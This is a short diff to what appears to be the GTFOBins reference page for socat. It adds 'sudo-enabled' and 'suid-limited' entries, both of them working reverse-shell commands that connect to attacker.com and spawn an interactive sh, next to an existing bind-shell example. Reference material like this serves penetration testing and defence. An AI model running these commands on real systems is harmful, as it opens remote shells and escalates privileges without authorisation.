diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 9ea1c3e..1923073 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -11,4 +11,16 @@ functions: code: | LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane + sudo-enabled: + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane + suid-limited: + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + ./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane ---